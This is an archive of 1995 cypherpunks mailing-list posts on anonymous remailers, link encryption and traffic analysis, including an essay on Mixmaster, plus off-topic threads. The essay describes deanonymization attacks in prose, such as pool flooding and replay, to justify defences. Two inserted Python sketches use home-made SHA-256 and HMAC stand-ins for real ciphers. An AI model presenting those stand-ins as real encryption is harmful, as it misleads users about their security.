This gives me an idea.  Imagine a server that allows you to open a 
low bandwidth (let's say around 100 cps, in order to reduce costs)
link-encrypted telnet session with it, and provides you with a number 
of services, for example a link-encrypted talk session with another 
user.  You'll need to maintain the link 24 hours a day to defend 
against statistical analysis, and of course you can chain a number of 
these servers together in a way similar to chaining remailers.

This scheme seems to provide untraceability while getting around the 
latency cost problem of remailers, thus allowing users to talk to each 
other in real time, anonymously.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyinajl0sXKgdnV5AQHqMgQAkyA16Ai/s885L68KXFlqsLC6RFU7S8dc
+ynRv/LJ1Lp6ZxyBel0sBqXixh3cJDIuZKXOHcUpfir0Wn7ifxgdoj2SvUdHOes+
af9GGZZOvo+hXhzbN/PYUI8AZLVbmqa8ighPUPdXNxA0Fq0ypMn7ZpxhzeW5gPJq
mRtK2adKucQ=
=alXA
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> Big Bang --> atoms --> complex macromolecules --> biological evolution
--> central nervous systems --> social learning --> symbolic communication
--> computers --> internetworking --> close-coupled automation
--> high-bandwidth brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?
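
The constant-rate padded link proposed above, and the fixed-size constant-bandwidth stream in Richard K. Moore's earlier message, as an added example (not code from either poster). The 100 cps rate is Wei Dai's figure; the 32-byte cell, the framing and all names are assumptions, and each cell is assumed to be encrypted by a link layer that is not shown, so an observer sees only when cells are sent and how large they are.

```python
import os


class PaddedLink:
    """Sender: emits exactly one fixed-size cell per tick, data or not."""

    def __init__(self, cell_size: int = 32, cps: int = 100):
        if not 2 <= cell_size <= 256:
            raise ValueError("cell_size must fit a one-byte length field")
        self.cell_size = cell_size
        self.tick_seconds = cell_size / cps  # time one cell occupies the line
        self.pending = bytearray()

    def submit(self, message: bytes) -> None:
        # A 2-byte length prefix marks message boundaries inside the stream.
        self.pending += len(message).to_bytes(2, "big") + message

    def tick(self) -> bytes:
        room = self.cell_size - 1
        chunk = bytes(self.pending[:room])
        del self.pending[:room]
        filler = os.urandom(room - len(chunk))  # random noise fills idle space
        # First byte says how much of the cell is real; the rest is discarded.
        return bytes([len(chunk)]) + chunk + filler


class PaddedLinkReceiver:
    """Receiver: strips filler and reassembles length-prefixed messages."""

    def __init__(self):
        self.stream = bytearray()
        self.messages = []

    def accept(self, cell: bytes) -> None:
        used = cell[0]
        self.stream += cell[1:1 + used]
        while len(self.stream) >= 2:
            n = int.from_bytes(self.stream[:2], "big")
            if len(self.stream) < 2 + n:
                break
            self.messages.append(bytes(self.stream[2:2 + n]))
            del self.stream[:2 + n]


def run_session(schedule: dict, total_ticks: int,
                cell_size: int = 32, cps: int = 100) -> dict:
    """schedule maps tick number -> list of messages submitted at that tick."""
    link = PaddedLink(cell_size, cps)
    rx = PaddedLinkReceiver()
    trace, delivered_at = [], []
    for t in range(total_ticks):
        for message in schedule.get(t, []):
            link.submit(message)
        cell = link.tick()
        # What a wiretap on the line records: send time and cell size only.
        trace.append((round(t * link.tick_seconds, 3), len(cell)))
        before = len(rx.messages)
        rx.accept(cell)
        delivered_at += [t] * (len(rx.messages) - before)
    return {"trace": trace, "received": rx.messages, "delivered_at": delivered_at}


if __name__ == "__main__":
    idle = run_session({}, 20)
    busy = run_session({5: [b"x" * 100]}, 20)  # constructed 100-byte message
    print("traces identical:", idle["trace"] == busy["trace"])
    print("delivered at tick:", busy["delivered_at"])
```

The idle and busy sessions produce the same trace; the cost is that a 100-byte message submitted at tick 5 needs four cells and completes at tick 8.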




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Fri, 27 Jan 95 00:17:03 PST
To: eric@remailer.net (Eric Hughes)
Subject: Traffic monitoring (Was: Reordering, not Latency)
Message-ID: <199501270816.AA23846@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

eric@remailer.net (Eric Hughes) wrote:

> If I were doing global Internet monitoring, I wouldn't be doing it
> in-band.  Too much cooperation by the vendors required; too much
> discovery.  Rather, I'd gain access to the trunks directly and do my
> own demodulation and decoding.

How would you get access to the trunks?  Aren't they mostly optic 
fibers now?  Also, since Internet traffic is growing at a geometric 
rate, the probability of anyone or any organization having the 
capacity to monitor and process ALL of Internet traffic should be 
very small and decreasing.  It would be much easier to install 
sniffers on selected local networks (e.g., those containing 
remailers or other entities you're interested in).

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyirWjl0sXKgdnV5AQG12QP+LXVa/INx3JmwBqmSrZo8kNiteYIG9AwV
9hG+3qUt6/yvkz0v137lPVOGK+J78MkCDVYnPHeBcdYwmZ7Z8mpfaQGaPQnMnj9x
Q9z9hbK9JVBYaN7Hpv0OtIobKn2OlEsJjdZxr8mcuqVN/OS1kHarmhtM2pyfxJ/l
uY5/UGIlprA=
=jIHR
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> Big Bang --> atoms --> complex macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> consciousness
--> computers --> internetworking --> close-coupled automation
--> high-bandwidth brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 29 Jan 95 23:43:09 PST
To: cypherpunks@toad.com
Subject: Video walls have ears
Message-ID: <gate.TJNkZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Electric Dreams #44 is on the futility of videoconferencing; e-mail focuses
and will reign supreme. Anonymous videoconferencing is touched upon. Tim May
would approve. #45, the latest, is on Boolean algebra and Being Analogue -
analogue VLSI, bio-chips, optical and quantum computing etc.

ObCypherpunk: we all _do_ realize, of course, that serious violations of
privacy will continue for some time to be in the _analogue_ domain - from
RF interception and laser eavesdropping to thumbscrews. Perhaps some solutions
lie there too - the quantum anti-interception communication idea for example.
And lead walls.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Thu, 26 Jan 95 22:13:14 PST
To: cypherpunks@toad.com
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <m0rWbPO-000yxSC@myriad.pc.cc.cmu.edu>
Message-ID: <1P8AlKJXYHxT078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Again in the vein of simple to implement...you could set up several
ghost machines that don't really exist but look as if they were
connected to the IP machine through uucp.  I'm not really sure what
the From: address would look like, but it should be easy to generate.

If this was workable, you could create x ghost machines and randomly
pick a From: for each message.  True, the Inet box would be ID'ed,
but as a transmission agent, not an originator.

As I said, I don't know how uucp and Internet mix today, my e-mail
address used to say {...}!uunet!reign!storm.
--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.
 According to the obituary notices, a mean and unimportant person never dies.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 26 Jan 95 21:49:30 PST
To: tedwards@src.umd.edu (Thomas Grant Edwards)
Subject: Re: CERT statement
In-Reply-To: <Pine.SUN.3.91.950126142119.21338C-100000@thrash.src.umd.edu>
Message-ID: <199501270548.AAA02558@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Is it my imagination, or is CERT just trying to firewall up the internet 
| into uselessness?

	Firewalls do not make the net useless, they make it possible
to do real work.  A well designed firewall is only minimally intrusive
into your work.  Far less intrusive than, say, someone reading all of
your company's unencrypted mail for a few months.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Thu, 26 Jan 95 22:14:37 PST
To: sameer <sameer@c2.org>
Subject: Re: Starting a remailer
In-Reply-To: <199501262120.NAA10701@infinity.c2.org>
Message-ID: <Zc8AlKJXYPcE078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

I'm going to be along to set up a remailer shortly.

Two questions:

Since I've only limited bucks but have certain needs, can I get a
package deal on a remailer shell account and the MX service?  What
I'd like is to have all mail to xxxx@myname.com to be forwarded to
my shell account no matter what xxxx is.  Preserving the xxxx, though.

Given the goal of limiting remailer liability, what about having
them be anonymous?  Instead of sending you a check, send an unidentified
money order.  This would even allow ownership to change on a frequent
basis without the system owner knowing who the current operator is.

Thoughts?  Comments?  Offers to send cute girls?
--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 26 Jan 95 21:56:47 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: "Subway" remailers
In-Reply-To: <9501262213.AA23510@toad.com>
Message-ID: <199501270556.AAA02671@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	The idea is a very good one, it's usually called "link
encryption."  The idea is to make it difficult to tell when someone is
using a line by filling that line with random noise that looks like
encrypted data.

	Making a remailer do this is an interesting idea.  Perhaps a
subscription facility, so you can ask a remailer to send you X
messages per day, with X higher than your anticipated traffic?
Alternately, you could get roughly X messages per day, so a small
overflow wouldn't show up at once.

Adam



| "Subway" remailers would exchange identical sized "containers", much
| like a subway at semi-regular pulses or intervals. It would require
| a ring of remailers large enough (yeah, I know) to make traffic analysis
| of entrance and exit points difficult and/or expensive.


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 27 Jan 95 01:14:49 PST
To: cypherpunks@toad.com
Subject: Re: link encryption and anonymous interactivity (Was: "Subway" remai
Message-ID: <ab4e6664070210049f4e@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>This gives me an idea.  Imagine a server that allows you to open a
>low bandwidth (let's say around 100 cps, in order to reduce costs)
>link-encrypted telnet session with it, and provides you with a number
>of services, for example a link-encrypted talk session with another
>user.  You'll need to maintain the link 24 hours a day to defend
>against statistical analysis, and of course you can chain a number of
>these servers together in a way similar to chaining remailers.
>
>This scheme seems to provide untraceability while getting around the
>latency cost problem of remailers, thus allowing users to talk to each
>other in real time, anonymously.
>
>Wei Dai
>

I like this. One complication comes to mind with chaining. You can not set
up the whole chain at once. That would give it all away. In some sense you
are only mixed with other people who build these "chain links" at the same
time. Since you are only likely to build one or two (once built there is no
reason to take it down), you want to build it very slowly to allow many
links to be built out of the machine you are connected to before you build
your link out the next machine in the chain.

Also, if other people take their chains down, you must too, or I suspect
that there will be some information pointing to the only chain not to have
changed (this would only be statistical). I am not so sure about this last
argument though.

                -Lance Cottrell
-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLyi3R1Vkk3dax7hlAQFKnQP9FMKTQ+mEmICIPNXOasd2O/SDy4B4yJtv
uMX1AcS8jYSoDLUqf1+j6yGj3NW++5sr/6qNE5+DXpOpc3c3plCoiFIRSL8Ir4dw
WmW9J2GBtz5pJEjWWnlCfeqvDnaHmleCDnaGv6vo3+sZJrxn/NpUEoHiduLn+yg8
poIBFxw8B6Y=
=2X/2
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 27 Jan 95 01:14:42 PST
To: cypherpunks@toad.com
Subject: Mixmaster and remailers
Message-ID: <ab4e688f0902100421df@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


Here is a text version of an essay on Mixmaster and remailers in general.
I am going to try to put this in HTML and stick it on my home page.
If you want the original Mac version (distributed at today's San Diego
Cypherpunks meeting) let me know (Word 5.0). The list software has been
balking when I try to post in MIME encoded. The figures will be in the
HTML, and are in the Mac version.

--------------------------------
**Cypherpunk remailers.

The structure of current remailer messages is a nested set of encrypted
messages. Each message is encrypted to a remailer. The message contains the
instructions for each remailer (such as where to send the message next) and
the message to be forwarded. Each remailer removes a layer of encryption,
and accompanying instructions, takes any requested actions, and sends the
message on to the next destination.

Figure 1

The figure above graphically represents a message that will be sent through
3 remailers (A,B,C) and finally to Bob. The boxes represent encryption,
with the name of the person to whom the message is encrypted outside the
upper left corner of the box. One important fact is immediately clear from
this diagram; the message shrinks after each hop.

Cypherpunk remailers do several things:
        Send a message to another email address or post it to a news group.
        Accept encrypted messages with instructions for processing hidden
          inside the encrypted envelope.
        Strip off all (or at least some) mail headers.
        Add new headers (like subject lines).
        Remove some information from the end of the message.
        Encrypt part of the message using a key specified in the message.

Some but not all remailers can also do the following:
        Hold messages for some fixed or random time (latency).
        Reorder messages keeping a fixed minimum number in the remailer at
          all times.


**Attacks on Cypherpunk remailers.

Since anonymous remailers are designed to prevent traffic analysis, the
best way to understand their weaknesses is to study various attacks that an
opponent might use against them. I will assume a very powerful opponent,
both to present a worst case scenario, and because it is possible to resist
these attacks using second generation remailers.

*Threat model.
I assume that an attacker is able to record the contents of all messages
into and out of all remailers, along with the times they arrive and depart.
All messages are monitored as they leave the sender's machine, and as they
arrive at the destination. The attacker is able to send an unlimited number
of messages through the remailers, including previously intercepted
messages. Messages can also be prevented from arriving at their
destinations (denial of service). The attacker has compromised some (but
not all) of the remailers, and knows the source, destination, and contents
of all messages passing through the compromised remailers. This set of
attacker abilities and resources is the threat model.

*Trivial Attacks.
From the threat model it is prima facie obvious that unencrypted messages
can be tracked, so I will consider only encrypted communications.
The use of only one remailer is also insecure. If that remailer is
compromised, you have no security because the operator knows both the
originating and final addresses.

*Reordering.
Chains of remailers with encryption are better, but still vulnerable.
Messages can be traced through these remailers, because incoming messages
are forwarded directly after processing. When a message arrives, another
leaves immediately.  With no further information the attacker knows that
these are the same message despite any precautions that may have been
taken. This can even be done retroactively using mail logs (if those are
kept).

This is the biggest problem with standard Cypherpunk remailers. The first
fix proposed was to delay incoming messages for some random length of time.
If this time were longer than the time between message arrivals, then it
would be impossible to know (with certainty) which incoming message
corresponded to which outgoing message. This proposal is weak in several
respects. The exact amount of protection provided by latency is unknown. It
depends on the traffic through the remailer at that time. If there are many
messages arriving in the average holding time, then the identity of the
message is reasonably well disguised, but if there is very little traffic
(due to normal fluctuations, network outages, or denial of service attacks)
then little or no protection is provided. To provide some minimum level of
protection, considering only normal traffic variations, the latency must be
much larger than it would have to be at times of maximum traffic.

Although reordering solves this problem, it also opens up another possible
attack. Reordering always involves keeping some number of messages in the
remailer at all times. These messages are called the message "pool." The
most efficient reordering scheme is to keep N messages in the pool, and to
send out one of the (N+1) messages in the pool (including the one that just
arrived) chosen at random. Unfortunately this scheme is susceptible to a
"spam" attack.
An attacker sends many more than N messages to the remailer. These messages
will displace all the real messages in the pool, leaving only messages
which the attacker can recognize. If many more than N messages are sent to a
remailer then its pool of messages will contain only planted messages
(which can be recognized). If the attacker sends another batch of messages
after your message arrives, your message will be flushed back out of the
pool. Since the attacker can recognize his own message, yours will be
obvious.

Combining latency and reordering gives some resistance to this attack.
Rather than sending out one message from the pool each time a new message
arrives, periodically all but N messages in the pool are sent. If, during
an average period, several real messages have arrived then even if the pool
of messages is flushed out, there will be more than just your message mixed
in with the attacker's messages.
If the attacker combines the spam with a denial of service attack, then
your message would be the only non-attacker message again. There is nothing
you can do if the attacker can ensure that yours is the only message
traversing the entire network of remailers. With ideal remailers your
message could be any one of the messages passing through any remailer at
the same time. If yours is the only message passing through the remailer
network, then you are toast.

*Size & Distinguishability.
Suppose now that your message is chained through remailers that are
delaying and reordering at every hop. Your messages can still be tracked by
size.  By default messages decrease in size by a small (and approximately
known) amount at each hop. Even if your message is well mixed with the
other messages in the remailer, and even if they are all different sizes,
they are still distinguishable. It is possible to have the remailer remove
padding from the message at each hop, but this only decreases the size
of the message, and only to a minimum established by the size of the actual
message you want to send. You are also limited by the fact that extremely
large messages will stand out, since your message must change size by a
large fraction of its own size at each hop to ensure maximum confusion.
While removing padding at each step makes traffic analysis much more
difficult, it does leak information. All messages that leave a remailer
larger than your message was when it arrived are known not to be yours, and
if the use of this feature is unusual, then your message will stand out as
being the only one to change size by a nonstandard amount. The solution is
clear: all messages should be exactly the same size.

*Replay attacks
Unfortunately, reordered, indistinguishable messages can still be tracked.
This attack can be used to follow a message to its final destination, or to
backtrack from the end to the original sender. Both of these techniques use
a type of spam attack. To trace a message forward through the chain of
remailers, the attacker captures your message and sends many copies of it
to the first remailer. Many identical messages will then emerge from the
remailer and move on to the next remailer. This bump in remailer traffic
will show the route of the message. When it becomes too dispersed from
reordering, the message can be captured between two remailers, and many
copies re-introduced at that point.

To prevent this attack remailers must refuse to send any message more than
once. This can be done by including a random ID number for each hop, which
the remailer records. Unfortunately this places large storage demands on
the remailer, but the impact can be limited if old IDs are removed from the
list, or the remailer's key is changed periodically (at which point the
list can be cleared). A better solution is to require anonymous e-cash
postage in each layer. If the message is resent, then the cash has been
doubly spent, and the remailer would refuse to send it. This also has the
benefit of making spams expensive, and of motivating remailer operators to
provide superior services.


**Mixmaster.

The only type 2 remailer is Mixmaster. Its design philosophy is strongly
influenced by Chaum's paper on digital mixes (the origin of its name).
Below is a diagram of the structure of a Mixmaster packet. Rather than 4
there are actually 20 headers. Messages are sent as one or more packets
(messages consisting of multiple packets are called multi-part messages).

Figure 2

When remailer A gets this message, it will decrypt the PGP encrypted packet
at the top, and check to see if it has seen the ID number before. If so,
the message is discarded. The first header (before decryption) is added to
the end of the list of headers, and all the others are shifted up one. All
headers and the body packet (the section at the end with the text to be
sent) are decrypted with the IDEA key in the header. This reveals a PGP
encrypted header for the next remailer at the top, and obscures the old top
header (now at the bottom of the stack).

The header for the last remailer in the chain contains a flag indicating
that it is the last hop, and if it is part of a multipart message. If this
packet contains the entire message (it is not a multi-part message), the
body is decrypted and the plain text is placed in the reordering pool,
ready to be sent on. If it is only one part of the message, the Message ID
number is used to identify the other parts as they arrive. When all the
parts have arrived the message is reassembled, and placed in the pool. If
not all parts arrive within some time limit, then the message is discarded.
Only the last remailer in the chain can see that a group of remailer
packets are all part of a single message. To all the others, they are
completely independent.

All Mixmaster packets are exactly the same length, and all bits are
encrypted with an IDEA key at every hop, so no information about the
identity of the message is visible to the observer. Even a compromised
remailer can only know the previous and next locations in the chain. It can
not know how many hops have preceded it, or how many will follow (unless it
is the final hop).

These messages are rather large. Each of the 20 headers is 512 bytes, and
the body is 10k. The plain text is compressed to minimize the need for
multipart messages, which offer somewhat less security because all parts
follow the same chain of remailers.

*Future features
In the near future the Mixmaster user front end will allow the individual
packets of a multipart message to be routed independently.
Mixmaster remailers that indicate that they can accept socket connections
will exchange messages directly. The messages will be super-encrypted with
an IDEA key derived from a Diffie-Hellman key exchange. This provides
forward security against remailer operators being asked to decrypt
intercepted messages.


**Nothing is perfect.

Even if you are using a perfect network of remailers, you can still be
tracked. Only so many messages pass through the network of remailers in any
given day. If Alice sending a message usually correlates with Bob receiving
a message, it is likely that she is sending messages to him. This was
discussed in some detail in several messages by Hal and Louis Cypher. One
defense is to send dummy messages in to the remailer "bramble" so your
messages correlate with everything. These must be sent at random times so
that your real messages do not stand out.

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
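
The per-hop packet handling the essay above describes (20 headers of 512 bytes plus a 10k body, replay check on the hop's ID, header shift, decryption of every slot), as an added Python sketch that is not part of the original post and is not Mixmaster's code. Assumptions: a SHA-256 counter-mode keystream stands in for IDEA, an HMAC-tagged symmetric seal stands in for PGP encryption to each remailer, and the header field layout and all names are hypothetical.

```python
import hashlib
import hmac
import os

HEADERS, HDR_LEN, BODY_LEN = 20, 512, 10240   # sizes stated in the essay
PACKET_LEN = HEADERS * HDR_LEN + BODY_LEN     # 20480 bytes at every hop
SEALED = HDR_LEN - 32                         # header bytes left after nonce + tag


def keystream(key: bytes, slot: int, length: int) -> bytes:
    """Assumed stand-in for IDEA: SHA-256 in counter mode, keyed per slot position."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        block = key + slot.to_bytes(2, "big") + counter.to_bytes(4, "big")
        out += hashlib.sha256(block).digest()
        counter += 1
    return bytes(out[:length])


def xor(data: bytes, stream: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, stream))


def seal(secret: bytes, plain: bytes) -> bytes:
    """Assumed stand-in for PGP encryption of one header to one remailer."""
    nonce = os.urandom(16)
    ct = xor(plain.ljust(SEALED, b"\0"), keystream(secret + nonce, 0, SEALED))
    tag = hmac.new(secret, nonce + ct, hashlib.sha256).digest()[:16]
    return nonce + tag + ct


def unseal(secret: bytes, slot: bytes) -> bytes:
    nonce, tag, ct = slot[:16], slot[16:32], slot[32:]
    expected = hmac.new(secret, nonce + ct, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):
        raise ValueError("top header is not addressed to this remailer")
    return xor(ct, keystream(secret + nonce, 0, SEALED))


def build_packet(chain, secrets, message: bytes) -> bytes:
    """Sender side: one sealed header per hop, random filler in the unused slots."""
    if not 0 < len(chain) <= HEADERS or len(message) > BODY_LEN - 2:
        raise ValueError("chain or message too long for one packet")
    keys = [os.urandom(16) for _ in chain]
    slots = []
    for m, name in enumerate(chain):
        last = m == len(chain) - 1
        nxt = b"" if last else chain[m + 1].encode()
        # Hypothetical layout: 16-byte ID | 16-byte hop key | last-hop flag | next hop
        slot = seal(secrets[name], os.urandom(16) + keys[m] + bytes([int(last)]) + nxt)
        # Hop i shifts this header into slot m-1-i and then decrypts that slot,
        # so pre-encrypt it with hop i's key at exactly that position.
        for i in range(m):
            slot = xor(slot, keystream(keys[i], m - 1 - i, HDR_LEN))
        slots.append(slot)
    slots += [os.urandom(HDR_LEN) for _ in range(HEADERS - len(chain))]
    body = (len(message).to_bytes(2, "big") + message).ljust(BODY_LEN, b"\0")
    for key in keys:
        body = xor(body, keystream(key, HEADERS, BODY_LEN))
    return b"".join(slots) + body


class Remailer:
    def __init__(self, name: str, secret: bytes):
        self.name, self.secret, self.seen_ids = name, secret, set()

    def rotate_key(self, new_secret: bytes) -> None:
        """Old packets no longer unseal under the new key, so the ID list can be cleared."""
        self.secret, self.seen_ids = new_secret, set()

    def process(self, packet: bytes):
        """Return (next_hop, packet), or (None, plaintext) at the last hop."""
        if len(packet) != PACKET_LEN:
            raise ValueError("packet is not the standard size")
        slots = [packet[i * HDR_LEN:(i + 1) * HDR_LEN] for i in range(HEADERS)]
        body = packet[HEADERS * HDR_LEN:]
        plain = unseal(self.secret, slots[0])
        packet_id, key, last = plain[:16], plain[16:32], plain[32]
        if packet_id in self.seen_ids:
            raise ValueError("replayed packet discarded")
        self.seen_ids.add(packet_id)
        # Old top header (still sealed) goes to the bottom, the rest move up one,
        # then every slot and the body are decrypted with this hop's key.
        slots = slots[1:] + slots[:1]
        slots = [xor(s, keystream(key, i, HDR_LEN)) for i, s in enumerate(slots)]
        body = xor(body, keystream(key, HEADERS, BODY_LEN))
        if last:
            return None, body[2:2 + int.from_bytes(body[:2], "big")]
        return plain[33:].rstrip(b"\0").decode(), b"".join(slots) + body
```
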






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 29 Jan 95 23:44:48 PST
To: cypherpunks@toad.com
Subject: GDRs
Message-ID: <gate.smqkZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


perry@imsi.com:
> Not quite right. ADRs are receipts used to permit the trading of
> *foreign* securities in American markets. The ADRs will have
> properties that shield American investors from all sorts of evils like
> getting warrant issues that aren't registered in the US. There is a
> new breed of these things called GDRs that I've heard tell of, though
> I know little about them. Bank of New York may be big in this business

GDRs (Global Depository Receipts) can be traded worldwide. Lots of big Indian
companies use them, issuing GDRs that represent split shares and are loosely
linked to share prices on Indian markets.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 26 Jan 95 22:32:52 PST
To: cypherpunks@toad.com
Subject: No more unix holy war !
Message-ID: <199501270634.BAA02738@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


From James Donald                   Jan 26, 95 07:14:19 pm +0800
[...]
> A:  This is not the proper place for such arguments.

Right, so why do you persist in sending them here ?

> B:  The statement is so flagrantly silly that the
> proper response is ridicule, not an answer.

Right, so why did you answer (and to the list, no less) ?

[...]
> [Childish insults, abuse, and flame bait deleted]

If that were true, this thread would be long dead.

[...]
> Note that although this flame has nothing to do with cypherpunks

Right, so why are you sending it to the cypherpunks list ?

From jamesd@com.informix.com        Jan 26, 95 08:05:46 pm +0800
> To summarize this thread, and I hope end it.

This was (briefly) promising.

From jamesd@com.informix.com         Jan 26, 95 09:00:03 pm +0800
> I am writing this under sun's unix imitation of Microsoft's
[...]

If you hoped to end the thread, why continue it like this less than an hour
later ?

From jamesd@com.informix.com         Jan 26, 95 09:05:10 pm +0800
> And did I mention that "make" used to treat a tab as semantically
[...]
> Oh yes, I did mention that.
> Well I guess I will mention it again.

Why ?  What about ending the thread ?

From jamesd@com.informix.com         Jan 26, 95 09:12:31 pm +0800
> And did I mention that in DOS you can type
>    rename *.txt *.asc
[...]

3 more messages in 13 minutes, and you said you hoped this thread would end ?

From jamesd@com.informix.com         Jan 26, 95 09:38:35 pm +0800
> And did I mention that in DOS you can type:
>    dir filename /s
[...]
> You are spared.  I will not mention "curses".

Why not spare us entirely by not sending all this mail which "has nothing to
do with cypherpunks" as you said ?

"Yes, James, you're absolutely right. I prostrate myself before your
magnificence."

Will you be quiet about this now ?  What do we need to do to make you hush up ?

 -L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 29 Jan 95 23:44:43 PST
To: cypherpunks@toad.com
Subject: PFF's Magna Carta and the new netserfs
Message-ID: <gate.ywRkZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


rkmoore@iol.ie (Richard K. Moore)
> Cyberspace and the American Dream:  A Magna Carta for the Knowledge Age
> Release 1.2 // August 22, 1994,  Progress and Freedom Foundation
> Analysis By:       Richard K. Moore       20 January 1995
> [...]
> It also spells the death of the central institutional paradigm of modern 
> life, the bureaucratic organization. (Governments, including the American 
> government, are the last great redoubt of bureaucratic power 
> [  Corporations, as a seat of bureaucratic power,
> [  manage to escape notice here. Ah well, so many
> [  details, so little time...

I've never figured out why governments are made out to be so bad; guns, ok,
but the problems of privacy we face on this list have little to do with that.
Corporations can be at least as bad - extreme government leads to socialism,
which often retains some form of citizen-participation in decision-making;
the corporate state, though, is exemplified in fascism, inherently much less
concerned about citizens' rights.

> Clear and enforceable property rights are essential
> for markets to work. Defining them is a central [...]
> If this analysis is correct, copyright and patent
> protection of knowledge (or at least many forms of it)
> may no longer be unnecessary...

As many of us have argued, in what is sometimes called a 'post-capitalist'
economy, (intellectual) property rights will not be enforceable. They may
be respected often - but then that requires no laws; after all no one had
tried to rob Phil Zimmermann of his (only recently trademarked) 'PGP'. Those
who depend too much on enforced rights will not survive. I've discussed in
my column, Electric Dreams, and on this list the shift in economic structure
that will have to take place - cooking-pot markets, knowledge exchanges etc;
concept patents enforced by net.cops are most certainly 'Second Wave thinking!'

> The current Administration has identified the right
> goal: Reinventing government for the 21st Century

Praise from Gingrich the Newt's pet think tank...

> This said, it is essential that we understand what it really means 
> to create a Third Wave government and begin the process of transformation.

'Third Wave' is such a lovely phrase that it is all too easy to hand wave 
opposing beliefs and concerns - "that's Second Wave thinking." Reminds me of 
the Freudian defense against Jung - "Ah, Jung was sexually repressed as an 
infant and therefore jealous of his mentor's open emphasis on id..." - 
solipsism is great for argument, but does little to elicit the truth.

> That is why obstructing such collaboration -- in the
> cause of forcing a competition between the cable and
> phone industries -- is *socially elitist*. To the

FOL! That competition and distributed ownership is elitist has long been
held true by communists; the reason we prefer it this way is that monopolies
end up being elitist too - benefiting those within them.

> [  There you have it. The American Dream and frontier
